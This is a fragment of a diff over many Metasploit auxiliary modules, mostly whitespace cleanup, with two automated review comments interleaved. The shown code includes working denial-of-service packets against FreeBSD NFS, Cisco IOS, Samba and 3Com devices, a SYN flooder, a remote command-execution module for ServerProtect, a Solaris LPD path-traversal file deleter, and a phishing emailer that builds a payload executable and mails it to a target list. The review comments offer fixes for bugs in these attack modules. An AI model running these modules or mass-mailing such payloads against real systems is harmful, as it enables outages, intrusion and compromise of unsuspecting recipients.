return serverprotect_rpc_call(0, stub)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Call the serverprotect RPC service
|
||||
#
|
||||
#
|
||||
def serverprotect_rpc_call(opnum, data = '')
|
||||
|
||||
begin
|
||||
|
||||
|
||||
connect
|
||||
|
||||
handle = dcerpc_handle(
|
||||
@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
|
||||
outp
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Apr 28 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(12174),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
|
||||
@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
connect
|
||||
|
||||
len = 2 + datastore['CMD'].length
|
||||
|
||||
len = 2 + datastore['CMD'].length
|
||||
|
||||
data = [0x00000000].pack('V')
|
||||
data << len.chr
|
||||
data << "\x00"
|
||||
data << datastore['CMD'] + " "
|
||||
data << "\x00"
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(data)
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
if (!res)
|
||||
print_error("Did not recieve data. Failed?")
|
||||
else
|
||||
|
@ -1,6 +1,9 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Generic Emailer (SMTP)',
|
||||
'Description' => %q{
|
||||
This module can be used to automate email delivery.
|
||||
This code is based on Joshua Abraham's email script for social
|
||||
This code is based on Joshua Abraham's email script for social
|
||||
engineering.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://spl0it.org/' ],
|
||||
],
|
||||
],
|
||||
'Author' => [ 'et <et[at]metasploit.com>' ]))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
[
|
||||
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
|
||||
OptString.new('RPORT', [true, "SMTP server port",'25']),
|
||||
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
|
||||
], self.class)
|
||||
|
||||
# Hide this option from the user
|
||||
], self.class)
|
||||
|
||||
# Hide this option from the user
|
||||
deregister_options('MAILTO')
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
fileconf = File.open(datastore['YAML_CONFIG'])
|
||||
yamlconf = YAML::load(fileconf)
|
||||
|
||||
fileto = yamlconf['to']
|
||||
yamlconf = YAML::load(fileconf)
|
||||
|
||||
fileto = yamlconf['to']
|
||||
from = yamlconf['from']
|
||||
subject = yamlconf['subject']
|
||||
type = yamlconf['type']
|
||||
@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
attachment_file = yamlconf['attachment_file']
|
||||
attachment_file_type = yamlconf['attachment_file_type']
|
||||
attachment_file_name = yamlconf['attachment_file_name']
|
||||
|
||||
|
||||
### payload options ###
|
||||
make_payload = yamlconf['make_payload']
|
||||
zip_payload = yamlconf['zip_payload']
|
||||
@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
datastore['MAILFROM'] = from
|
||||
|
||||
|
||||
msg = File.open(msg_file).read
|
||||
|
||||
email_sig = File.open(sig_file).read
|
||||
|
||||
if (type !~ /text/i and type !~ /text\/html/i)
|
||||
if (type !~ /text/i and type !~ /text\/html/i)
|
||||
print_error("YAML config: #{type}")
|
||||
end
|
||||
|
||||
if make_payload
|
||||
|
||||
if make_payload
|
||||
|
||||
print_status("Creating payload...")
|
||||
system(
|
||||
"#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1")
|
||||
|
||||
if msf_change_ext
|
||||
if msf_change_ext
|
||||
msf_payload_newext = msf_filename
|
||||
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
|
||||
File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}")
|
||||
msf_filename = msf_payload_newext
|
||||
end
|
||||
|
||||
if zip_payload
|
||||
if zip_payload
|
||||
zip_file = msf_filename
|
||||
zip_file = zip_file.gsub(/\.\w+/, '.zip')
|
||||
system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1");
|
||||
msf_filename = zip_file
|
||||
attachment_file_type = 'application/zip'
|
||||
else
|
||||
else
|
||||
attachment_file_type = 'application/exe'
|
||||
end
|
||||
|
||||
@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if l !~ /\@/
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
nem = l.split(',')
|
||||
name = nem[0].split(' ')
|
||||
fname = name[0]
|
||||
lname = name[1]
|
||||
email = nem[1]
|
||||
|
||||
|
||||
if add_name
|
||||
email_msg_body = "#{fname},\n\n#{msg}"
|
||||
else
|
||||
|
||||
|
||||
if add_name
|
||||
email_msg_body = "#{fname},\n\n#{msg}"
|
||||
else
|
||||
email_msg_body = msg
|
||||
end
|
||||
|
||||
@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data_sig = File.open(sig_file).read
|
||||
email_msg_body = "#{email_msg_body}\n#{data_sig}"
|
||||
end
|
||||
|
||||
|
||||
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
|
||||
|
||||
mime_msg = Rex::MIME::Message.new
|
||||
@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mime_msg.to = email
|
||||
datastore['MAILTO'] = email.strip
|
||||
mime_msg.subject = subject
|
||||
|
||||
|
||||
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
|
||||
|
||||
|
||||
if attachment
|
||||
if attachment_file_name
|
||||
data_attachment = File.open(attachment_file).read
|
||||
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
send_message(mime_msg.to_s)
|
||||
sleep wait
|
||||
sleep wait
|
||||
end
|
||||
|
||||
|
||||
print_status("Email sent..")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the Cisco IOS
|
||||
This module triggers a Denial of Service condition in the Cisco IOS
|
||||
HTTP server. By sending a GET request for "/%%", the device becomes
|
||||
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
|
||||
tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
|
||||
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service',
|
||||
'Description' => %q{
|
||||
This module sends a specially-crafted NFS Mount request causing a
|
||||
This module sends a specially-crafted NFS Mount request causing a
|
||||
kernel panic on host running FreeBSD 6.0.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'OSVDB', '23511' ],
|
||||
[ 'CVE', '2006-0900' ],
|
||||
]))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(2049),], self.class)
|
||||
end
|
||||
|
||||
@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
|
||||
pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
|
||||
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
|
||||
|
||||
|
||||
print_status("Sending dos packet...")
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => '3Com SuperStack Switch Denial of Service',
|
||||
'Description' => %q{
|
||||
This module causes a temporary denial of service condition
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 24 2004'))
|
||||
|
||||
|
||||
register_options( [ Opt::RPORT(80) ], self.class )
|
||||
end
|
||||
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
rescue ::Errno::ECONNRESET
|
||||
print_status("DoS packet successful. #{rhost} not responding.")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer',
|
||||
'Description' => %q{
|
||||
This module triggers a use-after-free vulnerability in the Apache Software
|
||||
Foundation mod_isapi extension. In order to reach the vulnerable code, the
|
||||
Foundation mod_isapi extension. In order to reach the vulnerable code, the
|
||||
target server must have an ISAPI module installed and configured.
|
||||
|
||||
By making a request that terminates abnormally (either an aborted TCP connection or
|
||||
an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later,
|
||||
if another request comes for that ISAPI module, previously obtained pointers will
|
||||
if another request comes for that ISAPI module, previously obtained pointers will
|
||||
be used resulting in an access violation or potentially arbitrary code execution.
|
||||
|
||||
Although arbitrary code execution is theoretically possible, a real-world method of
|
||||
Although arbitrary code execution is theoretically possible, a real-world method of
|
||||
invoking this consequence has not been proven. In order to do so, one would need to
|
||||
find a situation where a particular ISAPI module loads at an image base address
|
||||
that can be re-allocated by a remote attacker.
|
||||
|
||||
Limited success was encountered using two separate ISAPI modules. In this scenario,
|
||||
a second ISAPI module was loaded into the same memory area as the previously
|
||||
a second ISAPI module was loaded into the same memory area as the previously
|
||||
unloaded module.
|
||||
},
|
||||
'Author' =>
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
|
||||
'Description' => %q{
|
||||
This module exploits a heap overflow in the Dell OpenManage
|
||||
This module exploits a heap overflow in the Dell OpenManage
|
||||
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
|
||||
exists due to a boundary error within the handling of POST requests,
|
||||
where the application input is set to an overly long file name.
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'CVE', '2004-0331' ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 26 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1311),
|
||||
@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
|
||||
'Description' => %q{
|
||||
The WEBrick::HTTP::DefaultFileHandler in WEBrick in
|
||||
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Request sent to #{rhost}:#{rport}")
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_status("Couldn't connect to #{rhost}:#{rport}")
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
|
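Review bot: The `rescue ::Timeout::Error, ::Errno::EPIPE` branch at the end of this hunk has an empty body, so a request that times out or hits a broken pipe ends with no output at all, while the `::Rex::ConnectionRefused` branch directly above it reports its outcome with `print_status`. For a DoS check the timeout may well be the interesting result, so it would help to report it, e.g. `print_status("No response from #{rhost}:#{rport} (timeout or connection dropped)")`, rather than swallowing it silently. The enclosing method begins outside the hunk, so I cannot see whether the caller distinguishes these cases some other way.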
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'kris katterjohn',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
'References' => [
|
||||
[ 'CVE', '2008-5081' ],
|
||||
[ 'OSVDB', '50929' ],
|
||||
[ 'OSVDB', '50929' ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 14 2008')
|
||||
|
||||
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.id = 0xbeef
|
||||
n.l3.ttl = 128
|
||||
n.l3.flags = 2
|
||||
|
||||
|
||||
n.l4 = Racket::L4::UDP.new
|
||||
n.l4.src_port = 0
|
||||
n.l4.dst_port = datastore['RPORT'].to_i
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba lsa_io_privilege_set Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow in the LSA RPC service
|
||||
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '34699'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
pipe = datastore['SMBPIPE'].downcase
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Mac OS X: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
|
||||
|
||||
stub = lsa_open_policy(dcerpc)
|
||||
stub << NDR.long(1)
|
||||
stub << NDR.long(0xffffffff)
|
||||
stub << NDR.long(0x100)
|
||||
stub << "X" * 0x100
|
||||
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
|
||||
begin
|
||||
@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow in the LSA RPC service
|
||||
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '34699'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
pipe = datastore['SMBPIPE'].downcase
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
dcerpc.call(0x0f, stub)
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption',
|
||||
'Description' => %q{
|
||||
This is a proof of concept denial of service module for Sendmail versions
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||
'Description' => %q{
|
||||
This module uses a vulnerability in the Solaris line printer
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
can be used to exploit the rpc.walld format string flaw, the
|
||||
missing krb5.conf authentication bypass, or simply delete
|
||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515),
|
||||
@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
|
||||
|
||||
r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
r_user = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
r_spool = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
|
||||
|
||||
# Create a simple control file...
|
||||
control = "H#{r_hostname}\nP#{r_user}\n";
|
||||
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02#{r_hostname}:#{r_spool}\n")
|
||||
res = sock1.get_once
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Theoretically, we could delete multiple files at once, however
|
||||
# the lp daemon will append garbage from memory to the path name
|
||||
# if we don't stick a null byte after the path. Unfortunately, this
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||
|
||||
dataf = Rex::Text.rand_text_alpha(100)+1
|
||||
|
||||
|
||||
print_status("Deleting #{datstore['RPATH']}...")
|
||||
if !(
|
||||
send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
|
||||
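Review bot: `print_status("Deleting #{datstore['RPATH']}...")` refers to `datstore`, which is not defined anywhere in this module, so `run` raises NameError at this line before any control file is sent; it should read `datastore['RPATH']` as the surrounding lines do. One line earlier, `dataf = Rex::Text.rand_text_alpha(100)+1` adds an Integer to a String, which raises TypeError in Ruby; judging from the `rand(8)+1` pattern used for the other random names in this file, the intended form was presumably `Rex::Text.rand_text_alpha(rand(100)+1)`, though I cannot see where `dataf` is consumed. The enclosing `run` method starts in an earlier hunk and continues past this one.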
@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||
sock1.close
|
||||
end
|
||||
|
||||
def send_file(s, type, name, data='')
|
||||
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => 'todb',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['BID', '37670'],
|
||||
['OSVDB', '61538'],
|
||||
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
|
||||
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
|
||||
])
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
|
||||
end
|
||||
|
||||
@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.ack = 0
|
||||
n.l4.seq = rand(0xffffffff)
|
||||
n.l4.add_option(101,"")
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
pkt = n.pack
|
||||
print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}")
|
||||
capture_sendto(pkt,rhost)
|
||||
close_pcap
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
|
||||
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
|
||||
])
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE')
|
||||
end
|
||||
|
||||
@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
while (num <= 0) or (sent < num)
|
||||
|
||||
n.l3.src_ip = srchost
|
||||
n.l3.src_ip = srchost
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = rand(128)+128
|
||||
n.l3.ttl = rand(128)+128
|
||||
n.l4.window = rand(4096)+1
|
||||
n.l4.src_port = sport
|
||||
n.l4.seq = rand(0x100000000)
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
|
@ -1,18 +1,29 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
